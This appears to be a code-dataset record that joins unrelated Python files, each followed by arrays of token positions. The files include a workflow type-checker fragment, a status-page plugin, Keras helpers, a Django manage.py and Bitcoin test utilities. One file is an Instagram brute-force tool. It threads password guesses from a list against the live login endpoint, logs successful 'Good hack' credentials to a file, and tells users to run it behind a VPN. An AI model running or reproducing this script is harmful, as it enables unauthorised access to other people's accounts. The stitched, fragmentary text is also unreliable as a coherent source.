% (shortname(src["id"]), json_dumps(src["type"]))) + "\n" + \
SourceLine(sink, "type").makeError(
" with sink '%s' of type %s"
% (shortname(sink["id"]), json_dumps(sink["type"])))
if linkMerge:
msg += "\n" + SourceLine(sink).makeError(" source has linkMerge method %s" % linkMerge)
warning_msgs.append(msg)
for exception in exceptions:
src = exception.src
sink = exception.sink
linkMerge = exception.linkMerge
msg = SourceLine(src, "type").makeError(
"Source '%s' of type %s is incompatible"
% (shortname(src["id"]), json_dumps(src["type"]))) + "\n" + \
SourceLine(sink, "type").makeError(
" with sink '%s' of type %s"
% (shortname(sink["id"]), json_dumps(sink["type"])))
if linkMerge:
msg += "\n" + SourceLine(sink).makeError(" source has linkMerge method %s" % linkMerge)
exception_msgs.append(msg)
for sink in step_inputs:
if ('null' != sink["type"] and 'null' not in sink["type"]
and "source" not in sink and "default" not in sink and "valueFrom" not in sink):
msg = SourceLine(sink).makeError(
"Required parameter '%s' does not have source, default, or valueFrom expression"
% shortname(sink["id"]))
exception_msgs.append(msg)
all_warning_msg = strip_dup_lineno("\n".join(warning_msgs))
all_exception_msg = strip_dup_lineno("\n".join(exception_msgs))
if warnings:
_logger.warning("Workflow checker warning:\n%s" % all_warning_msg)
if exceptions:
raise validate.ValidationException(all_exception_msg)
SrcSink = namedtuple("SrcSink", ["src", "sink", "linkMerge"])
def check_all_types(src_dict, sinks, sourceField):
# type: (Dict[Text, Any], List[Dict[Text, Any]], Text) -> Dict[Text, List[SrcSink]]
# sourceField is either "soure" or "outputSource"
"""Given a list of sinks, check if their types match with the types of their sources.
"""
validation = {"warning": [], "exception": []} # type: Dict[Text, List[SrcSink]]
for sink in sinks:
if sourceField in sink:
valueFrom = sink.get("valueFrom")
if isinstance(sink[sourceField], list):
srcs_of_sink = [src_dict[parm_id] for parm_id in sink[sourceField]]
linkMerge = sink.get("linkMerge", ("merge_nested"
if len(sink[sourceField]) > 1 else None))
else:
parm_id = sink[sourceField]
srcs_of_sink = [src_dict[parm_id]]
linkMerge = None
for src in srcs_of_sink:
check_result = check_types(src, sink, linkMerge, valueFrom)
if check_result == "warning":
validation["warning"].append(SrcSink(src, sink, linkMerge))
elif check_result == "exception":
validation["exception"].append(SrcSink(src, sink, linkMerge))
return validation
| [
[
[
7,
14
]
],
[
[
39,
49
],
[
9236,
9246
]
],
[
[
70,
73
]
],
[
[
75,
83
]
],
[
[
85,
89
]
],
[
[
144,
153
]
],
[
[
155,
163
]
],
[
[
165,
169
]
],
[
[
171,
179
]
],
[
[
181,
185
]
],
[
[
187,
192
]
],
[
[
194,
198
]
],
[
[
208,
241
],
[
9176,
9184
]
],
[
[
278,
288
],
[
6112,
6122
],
[
6327,
6337
],
[
6523,
6533
],
[
6668,
6678
],
[
6828,
6838
],
[
6967,
6977
],
[
7363,
7373
],
[
7553,
7563
],
[
7768,
7778
],
[
8022,
8032
],
[
8196,
8206
],
[
8395,
8405
],
[
8712,
8722
]
],
[
[
290,
297
],
[
6873,
6880
]
],
[
[
299,
315
],
[
8940,
8956
],
[
9006,
9022
]
],
[
[
323,
326
],
[
4276,
4279
]
],
[
[
348,
365
],
[
1464,
1481
]
],
[
[
390,
397
],
[
4485,
4492
],
[
9076,
9083
]
],
[
[
419,
428
],
[
6070,
6079
],
[
6432,
6441
],
[
6626,
6635
],
[
6787,
6796
],
[
7090,
7099
],
[
7176,
7185
],
[
7478,
7487
],
[
7662,
7671
],
[
8125,
8134
],
[
8297,
8306
],
[
8855,
8864
],
[
4110,
4119
]
],
[
[
448,
458
],
[
7500,
7510
],
[
7685,
7695
],
[
8147,
8157
],
[
8320,
8330
]
],
[
[
465,
474
],
[
1228,
1237
],
[
1266,
1275
],
[
1386,
1395
],
[
1407,
1416
]
],
[
[
645,
656
],
[
1206,
1217
],
[
1355,
1366
],
[
10276,
10287
]
],
[
[
1538,
1556
],
[
1367,
1385
],
[
1701,
1719
]
],
[
[
1882,
1904
],
[
927,
949
],
[
1022,
1044
],
[
2558,
2580
],
[
3076,
3098
],
[
3234,
3256
],
[
3383,
3405
],
[
3544,
3566
],
[
4318,
4340
]
],
[
[
3668,
3684
],
[
2704,
2720
]
],
[
[
4782,
4796
]
],
[
[
9226,
9233
],
[
10416,
10423
],
[
10548,
10555
]
],
[
[
9293,
9308
],
[
5452,
5467
],
[
5528,
5543
]
]
] |
from isserviceup.services.models.statuspage import StatusPagePlugin
class Loggly(StatusPagePlugin):
name = 'Loggly'
status_url = 'http://status.loggly.com//'
icon_url = '/images/icons/loggly.jpg'
| [
[
[
51,
67
],
[
83,
99
]
],
[
[
76,
82
]
]
] |
import tensorflow as tf
from contextlib import contextmanager
from PIL import Image
from keras import backend as K
from keras.utils.data_utils import OrderedEnqueuer
def heteroscedastic_loss(attention=False,
block_attention_gradient=False,
mode='l2'):
''' Heteroscedastic loss.'''
def het_loss(y_true, y_pred):
y_mean = y_pred[:,:,:,:3]
y_logvar = y_pred[:,:,:,3:]
y_logvar = K.clip(y_logvar, -10, 10)
if mode == 'l2':
euclidian_loss = K.square(y_true/127.5 - y_mean/127.5)
elif mode == 'l1':
euclidian_loss = K.abs(y_true/127.5 - y_mean/127.5)
loss = tf.exp(-y_logvar)*euclidian_loss + y_logvar
loss *= 127.5
if mode == 'l2':
loss *= 127.5
if attention:
attention_mask = K.sigmoid(y_logvar)
if block_attention_gradient:
attention_mask = K.stop_gradient(attention_mask)
loss = attention_mask * loss
return K.mean(loss, axis=-1)
return het_loss
@contextmanager
def concurrent_generator(sequence, num_workers=8, max_queue_size=32, use_multiprocessing=False):
enqueuer = OrderedEnqueuer(sequence, use_multiprocessing=use_multiprocessing)
try:
enqueuer.start(workers=num_workers, max_queue_size=max_queue_size)
yield enqueuer.get()
finally:
enqueuer.stop()
def init_session(gpu_memory_fraction):
K.tensorflow_backend.set_session(tensorflow_session(gpu_memory_fraction=gpu_memory_fraction))
def reset_session(gpu_memory_fraction):
K.clear_session()
init_session(gpu_memory_fraction)
def tensorflow_session(gpu_memory_fraction):
config = tf.ConfigProto()
config.gpu_options.allow_growth = True
config.gpu_options.per_process_gpu_memory_fraction = gpu_memory_fraction
return tf.Session(config=config)
def load_image(path):
img = Image.open(path)
if img.mode != 'RGB':
img = img.convert('RGB')
return img
| [
[
[
7,
23
],
[
1546,
1548
],
[
1685,
1687
],
[
605,
607
]
],
[
[
48,
62
],
[
940,
954
]
],
[
[
79,
84
],
[
1742,
1747
]
],
[
[
104,
116
],
[
1299,
1300
],
[
1436,
1437
],
[
416,
417
],
[
481,
482
],
[
560,
561
],
[
742,
743
],
[
817,
818
],
[
891,
892
]
],
[
[
152,
167
],
[
1064,
1079
]
],
[
[
173,
193
]
],
[
[
959,
979
]
],
[
[
1263,
1275
],
[
1455,
1467
]
],
[
[
1399,
1412
]
],
[
[
1495,
1513
],
[
1332,
1350
]
],
[
[
1717,
1727
]
]
] |
from __future__ import absolute_import
from __future__ import print_function
import requests, sys, threading, time, os, random
from random import randint
from six.moves import input
CheckVersion = str (sys.version)
import re
from datetime import datetime
print ('''
....
%
^
L
"F3 $r
$$$$.e$" .
"$$$$$" "
(insTof by 5) $$$$c /
. $$$$$$$P
."c $$$
.$c3b ..J$$$$$e
4$$$$ .$$$$$$$$$$$$$$c
$$$$b .$$$$$$$$$$$$$$$$r
$$$. .$$$$$$$$$$$$$$$$$$
$$$c .$$$$$$$ "$$$$$$$$$r
Author : Falah
snapchat : flaah999
Management depends on vpn software. Please use it before running the tool
""""""""""""""""""""""""""""""""""""""""""
''')
class InstaBrute (object):
def __init__(self):
try:
user = input ('username : ')
Combo = input ('passList : ')
print ('\n----------------------------')
except:
print (' The tool was arrested exit ')
sys.exit ()
with open (Combo, 'r') as x:
Combolist = x.read ().splitlines ()
thread = []
self.Coutprox = 0
for combo in Combolist:
password = combo.split (':')[0]
t = threading.Thread (target=self.New_Br, args=(user, password))
t.start ()
thread.append (t)
time.sleep (0.9)
for j in thread:
j.join ()
def cls(self):
linux = 'clear'
windows = 'cls'
os.system ([linux, windows][os.name == 'nt'])
def New_Br(self, user, pwd):
link = 'https://www.instagram.com/accounts/login/'
login_url = 'https://www.instagram.com/accounts/login/ajax/'
time = int (datetime.now ().timestamp ())
payload = {
'username': user,
'enc_password': f'#PWD_INSTAGRAM_BROWSER:0:{time}:{pwd}',
'queryParams': {},
'optIntoOneTap': 'false'
}
with requests.Session () as s:
r = s.get (link)
r = s.post (login_url, data=payload, headers={
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36",
"X-Requested-With": "XMLHttpRequest",
"Referer": "https://www.instagram.com/accounts/login/",
"x-csrftoken": 'ZxKmz4hXp6XKmTPg9lzgYxXN4sFr2pzo'
})
print (f'{user}:{pwd}\n----------------------------')
if 'checkpoint_url' in r.text:
print (('' + user + ':' + pwd + ' --> Good hack '))
with open ('good.txt', 'a') as x:
x.write (user + ':' + pwd + '\n')
elif 'two_factor_required' in r.text:
print (('' + user + ':' + pwd + ' --> Good It has to be checked '))
with open ('results_NeedVerfiy.txt', 'a') as x:
x.write (user + ':' + pwd + '\n')
InstaBrute()
| [
[
[
23,
38
]
],
[
[
62,
76
]
],
[
[
84,
92
],
[
2852,
2860
]
],
[
[
94,
97
],
[
203,
206
],
[
1878,
1881
]
],
[
[
99,
108
],
[
2114,
2123
]
],
[
[
110,
114
],
[
2240,
2244
]
],
[
[
116,
118
],
[
2380,
2382
],
[
2408,
2410
]
],
[
[
120,
126
]
],
[
[
146,
153
]
],
[
[
176,
181
],
[
1681,
1686
],
[
1723,
1728
]
],
[
[
183,
195
]
],
[
[
223,
225
]
],
[
[
247,
255
],
[
2609,
2617
]
],
[
[
1603,
1613
],
[
3859,
3869
]
]
] |
#!/usr/bin/env python
#from gevent import monkey
#monkey.patch_all(aggressive=True)
#from psycogreen.gevent import patch_psycopg
#patch_psycopg()
#import eventlet
#eventlet.monkey_patch()
#from psycogreen.eventlet import patch_psycopg
#patch_psycopg()
import os
import sys
if __name__ == "__main__":
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "internetnl.settings")
try:
from django.core.management import execute_from_command_line
except ImportError:
# The above import may fail for some other reason. Ensure that the
# issue is really that Django is missing to avoid masking other
# exceptions on Python 2.
try:
import django
except ImportError:
raise ImportError(
"Couldn't import Django. Are you sure it's installed and "
"available on your PYTHONPATH environment variable? Did you "
"forget to activate a virtual environment?"
)
raise
execute_from_command_line(sys.argv)
| [
[
[
262,
264
],
[
308,
310
]
],
[
[
272,
275
],
[
1031,
1034
]
],
[
[
431,
456
],
[
1005,
1030
]
],
[
[
694,
700
]
]
] |
class AutoVivification(dict):
"""Implementation of perl's autovivification."""
def __missing__(self, key):
value = self[key] = type(self)()
return value
weather = AutoVivification()
weather['china']['guangdong']['shenzhen'] = 'sunny'
weather['china']['hubei']['wuhan'] = 'sunny'
weather['USA']['California']['Los Angeles'] = 'sunny'
print(weather)
| [
[
[
6,
22
],
[
189,
205
]
],
[
[
179,
186
],
[
208,
215
],
[
260,
267
],
[
305,
312
],
[
365,
372
]
]
] |
#!/usr/bin/env python3
# Copyright (c) 2014-2018 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Helpful routines for regression testing."""
from base64 import b64encode
from binascii import hexlify, unhexlify
from decimal import Decimal, ROUND_DOWN
import hashlib
import inspect
import json
import logging
import os
import random
import re
from subprocess import CalledProcessError
import time
from . import coverage
from .authproxy import AuthServiceProxy, JSONRPCException
logger = logging.getLogger("TestFramework.utils")
# Assert functions
##################
def assert_fee_amount(fee, tx_size, fee_per_kB):
"""Assert the fee was in range"""
target_fee = round(tx_size * fee_per_kB / 1000, 8)
if fee < target_fee:
raise AssertionError("Fee of %s CPT too low! (Should be %s CPT)" % (str(fee), str(target_fee)))
# allow the wallet's estimation to be at most 2 bytes off
if fee > (tx_size + 2) * fee_per_kB / 1000:
raise AssertionError("Fee of %s CPT too high! (Should be %s CPT)" % (str(fee), str(target_fee)))
def assert_equal(thing1, thing2, *args):
if thing1 != thing2 or any(thing1 != arg for arg in args):
raise AssertionError("not(%s)" % " == ".join(str(arg) for arg in (thing1, thing2) + args))
def assert_greater_than(thing1, thing2):
if thing1 <= thing2:
raise AssertionError("%s <= %s" % (str(thing1), str(thing2)))
def assert_greater_than_or_equal(thing1, thing2):
if thing1 < thing2:
raise AssertionError("%s < %s" % (str(thing1), str(thing2)))
def assert_raises(exc, fun, *args, **kwds):
assert_raises_message(exc, None, fun, *args, **kwds)
def assert_raises_message(exc, message, fun, *args, **kwds):
try:
fun(*args, **kwds)
except JSONRPCException:
raise AssertionError("Use assert_raises_rpc_error() to test RPC failures")
except exc as e:
if message is not None and message not in e.error['message']:
raise AssertionError("Expected substring not found:" + e.error['message'])
except Exception as e:
raise AssertionError("Unexpected exception raised: " + type(e).__name__)
else:
raise AssertionError("No exception raised")
def assert_raises_process_error(returncode, output, fun, *args, **kwds):
"""Execute a process and asserts the process return code and output.
Calls function `fun` with arguments `args` and `kwds`. Catches a CalledProcessError
and verifies that the return code and output are as expected. Throws AssertionError if
no CalledProcessError was raised or if the return code and output are not as expected.
Args:
returncode (int): the process return code.
output (string): [a substring of] the process output.
fun (function): the function to call. This should execute a process.
args*: positional arguments for the function.
kwds**: named arguments for the function.
"""
try:
fun(*args, **kwds)
except CalledProcessError as e:
if returncode != e.returncode:
raise AssertionError("Unexpected returncode %i" % e.returncode)
if output not in e.output:
raise AssertionError("Expected substring not found:" + e.output)
else:
raise AssertionError("No exception raised")
def assert_raises_rpc_error(code, message, fun, *args, **kwds):
"""Run an RPC and verify that a specific JSONRPC exception code and message is raised.
Calls function `fun` with arguments `args` and `kwds`. Catches a JSONRPCException
and verifies that the error code and message are as expected. Throws AssertionError if
no JSONRPCException was raised or if the error code/message are not as expected.
Args:
code (int), optional: the error code returned by the RPC call (defined
in src/rpc/protocol.h). Set to None if checking the error code is not required.
message (string), optional: [a substring of] the error string returned by the
RPC call. Set to None if checking the error string is not required.
fun (function): the function to call. This should be the name of an RPC.
args*: positional arguments for the function.
kwds**: named arguments for the function.
"""
assert try_rpc(code, message, fun, *args, **kwds), "No exception raised"
def try_rpc(code, message, fun, *args, **kwds):
"""Tries to run an rpc command.
Test against error code and message if the rpc fails.
Returns whether a JSONRPCException was raised."""
try:
fun(*args, **kwds)
except JSONRPCException as e:
# JSONRPCException was thrown as expected. Check the code and message values are correct.
if (code is not None) and (code != e.error["code"]):
raise AssertionError("Unexpected JSONRPC error code %i" % e.error["code"])
if (message is not None) and (message not in e.error['message']):
raise AssertionError("Expected substring not found:" + e.error['message'])
return True
except Exception as e:
raise AssertionError("Unexpected exception raised: " + type(e).__name__)
else:
return False
def assert_is_hex_string(string):
try:
int(string, 16)
except Exception as e:
raise AssertionError(
"Couldn't interpret %r as hexadecimal; raised: %s" % (string, e))
def assert_is_hash_string(string, length=64):
if not isinstance(string, str):
raise AssertionError("Expected a string, got type %r" % type(string))
elif length and len(string) != length:
raise AssertionError(
"String of length %d expected; got %d" % (length, len(string)))
elif not re.match('[abcdef0-9]+$', string):
raise AssertionError(
"String %r contains invalid characters for a hash." % string)
def assert_array_result(object_array, to_match, expected, should_not_find=False):
"""
Pass in array of JSON objects, a dictionary with key/value pairs
to match against, and another dictionary with expected key/value
pairs.
If the should_not_find flag is true, to_match should not be found
in object_array
"""
if should_not_find:
assert_equal(expected, {})
num_matched = 0
for item in object_array:
all_match = True
for key, value in to_match.items():
if item[key] != value:
all_match = False
if not all_match:
continue
elif should_not_find:
num_matched = num_matched + 1
for key, value in expected.items():
if item[key] != value:
raise AssertionError("%s : expected %s=%s" % (str(item), str(key), str(value)))
num_matched = num_matched + 1
if num_matched == 0 and not should_not_find:
raise AssertionError("No objects matched %s" % (str(to_match)))
if num_matched > 0 and should_not_find:
raise AssertionError("Objects were found %s" % (str(to_match)))
# Utility functions
###################
def check_json_precision():
"""Make sure json library being used does not lose precision converting BTC values"""
n = Decimal("20000000.00000003")
satoshis = int(json.loads(json.dumps(float(n))) * 1.0e8)
if satoshis != 2000000000000003:
raise RuntimeError("JSON encode/decode loses precision")
def count_bytes(hex_string):
return len(bytearray.fromhex(hex_string))
def bytes_to_hex_str(byte_str):
return hexlify(byte_str).decode('ascii')
def hash256(byte_str):
sha256 = hashlib.sha256()
sha256.update(byte_str)
sha256d = hashlib.sha256()
sha256d.update(sha256.digest())
return sha256d.digest()[::-1]
def hex_str_to_bytes(hex_str):
return unhexlify(hex_str.encode('ascii'))
def str_to_b64str(string):
return b64encode(string.encode('utf-8')).decode('ascii')
def satoshi_round(amount):
return Decimal(amount).quantize(Decimal('0.00000001'), rounding=ROUND_DOWN)
def wait_until(predicate, *, attempts=float('inf'), timeout=float('inf'), lock=None):
if attempts == float('inf') and timeout == float('inf'):
timeout = 60
attempt = 0
time_end = time.time() + timeout
while attempt < attempts and time.time() < time_end:
if lock:
with lock:
if predicate():
return
else:
if predicate():
return
attempt += 1
time.sleep(0.05)
# Print the cause of the timeout
predicate_source = "''''\n" + inspect.getsource(predicate) + "'''"
logger.error("wait_until() failed. Predicate: {}".format(predicate_source))
if attempt >= attempts:
raise AssertionError("Predicate {} not true after {} attempts".format(predicate_source, attempts))
elif time.time() >= time_end:
raise AssertionError("Predicate {} not true after {} seconds".format(predicate_source, timeout))
raise RuntimeError('Unreachable')
# RPC/P2P connection constants and functions
############################################
# The maximum number of nodes a single test can spawn
MAX_NODES = 8
# Don't assign rpc or p2p ports lower than this
PORT_MIN = 11000
# The number of ports to "reserve" for p2p and rpc, each
PORT_RANGE = 5000
class PortSeed:
# Must be initialized with a unique integer for each process
n = None
def get_rpc_proxy(url, node_number, timeout=None, coveragedir=None):
"""
Args:
url (str): URL of the RPC server to call
node_number (int): the node number (or id) that this calls to
Kwargs:
timeout (int): HTTP timeout in seconds
Returns:
AuthServiceProxy. convenience object for making RPC calls.
"""
proxy_kwargs = {}
if timeout is not None:
proxy_kwargs['timeout'] = timeout
proxy = AuthServiceProxy(url, **proxy_kwargs)
proxy.url = url # store URL on proxy for info
coverage_logfile = coverage.get_filename(
coveragedir, node_number) if coveragedir else None
return coverage.AuthServiceProxyWrapper(proxy, coverage_logfile)
def p2p_port(n):
assert(n <= MAX_NODES)
return PORT_MIN + n + (MAX_NODES * PortSeed.n) % (PORT_RANGE - 1 - MAX_NODES)
def rpc_port(n):
return PORT_MIN + PORT_RANGE + n + (MAX_NODES * PortSeed.n) % (PORT_RANGE - 1 - MAX_NODES)
def rpc_url(datadir, i, rpchost=None):
rpc_u, rpc_p = get_auth_cookie(datadir)
host = '127.0.0.1'
port = rpc_port(i)
if rpchost:
parts = rpchost.split(':')
if len(parts) == 2:
host, port = parts
else:
host = rpchost
return "http://%s:%s@%s:%d" % (rpc_u, rpc_p, host, int(port))
# Node functions
################
def initialize_datadir(dirname, n):
datadir = get_datadir_path(dirname, n)
if not os.path.isdir(datadir):
os.makedirs(datadir)
with open(os.path.join(datadir, "generalcoin.conf"), 'w', encoding='utf8') as f:
f.write("regtest=1\n")
f.write("[regtest]\n")
f.write("port=" + str(p2p_port(n)) + "\n")
f.write("rpcport=" + str(rpc_port(n)) + "\n")
f.write("server=1\n")
f.write("keypool=1\n")
f.write("discover=0\n")
f.write("listenonion=0\n")
f.write("printtoconsole=0\n")
os.makedirs(os.path.join(datadir, 'stderr'), exist_ok=True)
os.makedirs(os.path.join(datadir, 'stdout'), exist_ok=True)
return datadir
def get_datadir_path(dirname, n):
return os.path.join(dirname, "node" + str(n))
def append_config(datadir, options):
with open(os.path.join(datadir, "generalcoin.conf"), 'a', encoding='utf8') as f:
for option in options:
f.write(option + "\n")
def get_auth_cookie(datadir):
user = None
password = None
if os.path.isfile(os.path.join(datadir, "generalcoin.conf")):
with open(os.path.join(datadir, "generalcoin.conf"), 'r', encoding='utf8') as f:
for line in f:
if line.startswith("rpcuser="):
assert user is None # Ensure that there is only one rpcuser line
user = line.split("=")[1].strip("\n")
if line.startswith("rpcpassword="):
assert password is None # Ensure that there is only one rpcpassword line
password = line.split("=")[1].strip("\n")
if os.path.isfile(os.path.join(datadir, "regtest", ".cookie")) and os.access(os.path.join(datadir, "regtest", ".cookie"), os.R_OK):
with open(os.path.join(datadir, "regtest", ".cookie"), 'r', encoding="ascii") as f:
userpass = f.read()
split_userpass = userpass.split(':')
user = split_userpass[0]
password = split_userpass[1]
if user is None or password is None:
raise ValueError("No RPC credentials")
return user, password
# If a cookie file exists in the given datadir, delete it.
def delete_cookie_file(datadir):
if os.path.isfile(os.path.join(datadir, "regtest", ".cookie")):
logger.debug("Deleting leftover cookie file")
os.remove(os.path.join(datadir, "regtest", ".cookie"))
def get_bip9_status(node, key):
info = node.getblockchaininfo()
return info['bip9_softforks'][key]
def set_node_times(nodes, t):
for node in nodes:
node.setmocktime(t)
def disconnect_nodes(from_connection, node_num):
for peer_id in [peer['id'] for peer in from_connection.getpeerinfo() if "testnode%d" % node_num in peer['subver']]:
try:
from_connection.disconnectnode(nodeid=peer_id)
except JSONRPCException as e:
# If this node is disconnected between calculating the peer id
# and issuing the disconnect, don't worry about it.
# This avoids a race condition if we're mass-disconnecting peers.
if e.error['code'] != -29: # RPC_CLIENT_NODE_NOT_CONNECTED
raise
# wait to disconnect
wait_until(lambda: [peer['id'] for peer in from_connection.getpeerinfo() if "testnode%d" % node_num in peer['subver']] == [], timeout=5)
def connect_nodes(from_connection, node_num):
ip_port = "127.0.0.1:" + str(p2p_port(node_num))
from_connection.addnode(ip_port, "onetry")
# poll until version handshake complete to avoid race conditions
# with transaction relaying
wait_until(lambda: all(peer['version'] != 0 for peer in from_connection.getpeerinfo()))
def connect_nodes_bi(nodes, a, b):
connect_nodes(nodes[a], b)
connect_nodes(nodes[b], a)
def sync_blocks(rpc_connections, *, wait=1, timeout=60):
"""
Wait until everybody has the same tip.
sync_blocks needs to be called with an rpc_connections set that has least
one node already synced to the latest, stable tip, otherwise there's a
chance it might return before all nodes are stably synced.
"""
stop_time = time.time() + timeout
while time.time() <= stop_time:
best_hash = [x.getbestblockhash() for x in rpc_connections]
if best_hash.count(best_hash[0]) == len(rpc_connections):
return
time.sleep(wait)
raise AssertionError("Block sync timed out:{}".format("".join("\n {!r}".format(b) for b in best_hash)))
def sync_mempools(rpc_connections, *, wait=1, timeout=60, flush_scheduler=True):
"""
Wait until everybody has the same transactions in their memory
pools
"""
stop_time = time.time() + timeout
while time.time() <= stop_time:
pool = [set(r.getrawmempool()) for r in rpc_connections]
if pool.count(pool[0]) == len(rpc_connections):
if flush_scheduler:
for r in rpc_connections:
r.syncwithvalidationinterfacequeue()
return
time.sleep(wait)
raise AssertionError("Mempool sync timed out:{}".format("".join("\n {!r}".format(m) for m in pool)))
# Transaction/Block functions
#############################
def find_output(node, txid, amount, *, blockhash=None):
"""
Return index to output of txid with value amount
Raises exception if there is none.
"""
txdata = node.getrawtransaction(txid, 1, blockhash)
for i in range(len(txdata["vout"])):
if txdata["vout"][i]["value"] == amount:
return i
raise RuntimeError("find_output txid %s : %s not found" % (txid, str(amount)))
def gather_inputs(from_node, amount_needed, confirmations_required=1):
"""
Return a random set of unspent txouts that are enough to pay amount_needed
"""
assert(confirmations_required >= 0)
utxo = from_node.listunspent(confirmations_required)
random.shuffle(utxo)
inputs = []
total_in = Decimal("0.00000000")
while total_in < amount_needed and len(utxo) > 0:
t = utxo.pop()
total_in += t["amount"]
inputs.append({"txid": t["txid"], "vout": t["vout"], "address": t["address"]})
if total_in < amount_needed:
raise RuntimeError("Insufficient funds: need %d, have %d" % (amount_needed, total_in))
return (total_in, inputs)
def make_change(from_node, amount_in, amount_out, fee):
"""
Create change output(s), return them
"""
outputs = {}
amount = amount_out + fee
change = amount_in - amount
if change > amount * 2:
# Create an extra change output to break up big inputs
change_address = from_node.getnewaddress()
# Split change in two, being careful of rounding:
outputs[change_address] = Decimal(change / 2).quantize(Decimal('0.00000001'), rounding=ROUND_DOWN)
change = amount_in - amount - outputs[change_address]
if change > 0:
outputs[from_node.getnewaddress()] = change
return outputs
def random_transaction(nodes, amount, min_fee, fee_increment, fee_variants):
"""
Create a random transaction.
Returns (txid, hex-encoded-transaction-data, fee)
"""
from_node = random.choice(nodes)
to_node = random.choice(nodes)
fee = min_fee + fee_increment * random.randint(0, fee_variants)
(total_in, inputs) = gather_inputs(from_node, amount + fee)
outputs = make_change(from_node, total_in, amount, fee)
outputs[to_node.getnewaddress()] = float(amount)
rawtx = from_node.createrawtransaction(inputs, outputs)
signresult = from_node.signrawtransactionwithwallet(rawtx)
txid = from_node.sendrawtransaction(signresult["hex"], True)
return (txid, signresult["hex"], fee)
# Helper to create at least "count" utxos
# Pass in a fee that is sufficient for relay and mining new transactions.
def create_confirmed_utxos(fee, node, count):
to_generate = int(0.5 * count) + 101
while to_generate > 0:
node.generate(min(25, to_generate))
to_generate -= 25
utxos = node.listunspent()
iterations = count - len(utxos)
addr1 = node.getnewaddress()
addr2 = node.getnewaddress()
if iterations <= 0:
return utxos
for i in range(iterations):
t = utxos.pop()
inputs = []
inputs.append({"txid": t["txid"], "vout": t["vout"]})
outputs = {}
send_value = t['amount'] - fee
outputs[addr1] = satoshi_round(send_value / 2)
outputs[addr2] = satoshi_round(send_value / 2)
raw_tx = node.createrawtransaction(inputs, outputs)
signed_tx = node.signrawtransactionwithwallet(raw_tx)["hex"]
node.sendrawtransaction(signed_tx)
while (node.getmempoolinfo()['size'] > 0):
node.generate(1)
utxos = node.listunspent()
assert(len(utxos) >= count)
return utxos
# Create large OP_RETURN txouts that can be appended to a transaction
# to make it large (helper for constructing large transactions).
def gen_return_txouts():
# Some pre-processing to create a bunch of OP_RETURN txouts to insert into transactions we create
# So we have big transactions (and therefore can't fit very many into each block)
# create one script_pubkey
script_pubkey = "6a4d0200" # OP_RETURN OP_PUSH2 512 bytes
for i in range(512):
script_pubkey = script_pubkey + "01"
# concatenate 128 txouts of above script_pubkey which we'll insert before the txout for change
txouts = "81"
for k in range(128):
# add txout value
txouts = txouts + "0000000000000000"
# add length of script_pubkey
txouts = txouts + "fd0402"
# add script_pubkey
txouts = txouts + script_pubkey
return txouts
# Create a spend of each passed-in utxo, splicing in "txouts" to each raw
# transaction to make it large. See gen_return_txouts() above.
def create_lots_of_big_transactions(node, txouts, utxos, num, fee):
addr = node.getnewaddress()
txids = []
for _ in range(num):
t = utxos.pop()
inputs = [{"txid": t["txid"], "vout": t["vout"]}]
outputs = {}
change = t['amount'] - fee
outputs[addr] = satoshi_round(change)
rawtx = node.createrawtransaction(inputs, outputs)
newtx = rawtx[0:92]
newtx = newtx + txouts
newtx = newtx + rawtx[94:]
signresult = node.signrawtransactionwithwallet(newtx, None, "NONE")
txid = node.sendrawtransaction(signresult["hex"], True)
txids.append(txid)
return txids
def mine_large_block(node, utxos=None):
# generate a 66k transaction,
# and 14 of them is close to the 1MB block limit
num = 14
txouts = gen_return_txouts()
utxos = utxos if utxos is not None else []
if len(utxos) < num:
utxos.clear()
utxos.extend(node.listunspent())
fee = 100 * node.getnetworkinfo()["relayfee"]
create_lots_of_big_transactions(node, txouts, utxos, num, fee=fee)
node.generate(1)
def find_vout_for_address(node, txid, addr):
"""
Locate the vout index of the given transaction sending to the
given address. Raises runtime error exception if not found.
"""
tx = node.getrawtransaction(txid, True)
for i in range(len(tx["vout"])):
if any([addr == a for a in tx["vout"][i]["scriptPubKey"]["addresses"]]):
return i
raise RuntimeError("Vout not found for address: txid=%s, addr=%s" % (txid, addr))
| [
[
[
281,
290
],
[
7944,
7953
]
],
[
[
312,
319
],
[
7610,
7617
]
],
[
[
321,
330
],
[
7870,
7879
]
],
[
[
351,
358
],
[
7298,
7305
],
[
8033,
8040
],
[
8058,
8065
],
[
16784,
16791
],
[
17587,
17594
],
[
17616,
17623
]
],
[
[
360,
370
],
[
8090,
8100
],
[
17648,
17658
]
],
[
[
378,
385
],
[
7681,
7688
],
[
7740,
7747
]
],
[
[
393,
400
],
[
8664,
8671
]
],
[
[
408,
412
],
[
7346,
7350
],
[
7357,
7361
]
],
[
[
420,
427
],
[
608,
615
]
],
[
[
435,
437
],
[
10928,
10930
],
[
10960,
10962
],
[
10995,
10997
],
[
11407,
11409
],
[
11419,
11421
],
[
11475,
11477
],
[
11487,
11489
],
[
11600,
11602
],
[
11691,
11693
],
[
11902,
11904
],
[
11917,
11919
],
[
11979,
11981
],
[
12484,
12486
],
[
12499,
12501
],
[
12548,
12550
],
[
12558,
12560
],
[
12603,
12605
],
[
12631,
12633
],
[
13078,
13080
],
[
13093,
13095
],
[
13201,
13203
],
[
13211,
13213
]
],
[
[
445,
451
],
[
16732,
16738
],
[
18009,
18015
],
[
18044,
18050
],
[
18101,
18107
]
],
[
[
459,
461
],
[
5809,
5811
]
],
[
[
485,
503
],
[
3098,
3116
]
],
[
[
511,
515
],
[
8302,
8306
],
[
8358,
8362
],
[
8575,
8579
],
[
8925,
8929
],
[
14992,
14996
],
[
15024,
15028
],
[
15211,
15215
],
[
15528,
15532
],
[
15560,
15564
],
[
15865,
15869
]
],
[
[
531,
539
],
[
10063,
10071
],
[
10157,
10165
]
],
[
[
563,
579
],
[
9950,
9966
]
],
[
[
581,
597
],
[
1871,
1887
],
[
4694,
4710
],
[
13703,
13719
]
],
[
[
599,
605
],
[
8705,
8711
],
[
13147,
13153
]
],
[
[
693,
710
]
],
[
[
1180,
1192
],
[
6342,
6354
]
],
[
[
1384,
1403
]
],
[
[
1521,
1549
]
],
[
[
1665,
1678
]
],
[
[
1767,
1788
],
[
1709,
1730
]
],
[
[
2325,
2352
]
],
[
[
3417,
3440
]
],
[
[
4454,
4461
],
[
4383,
4390
]
],
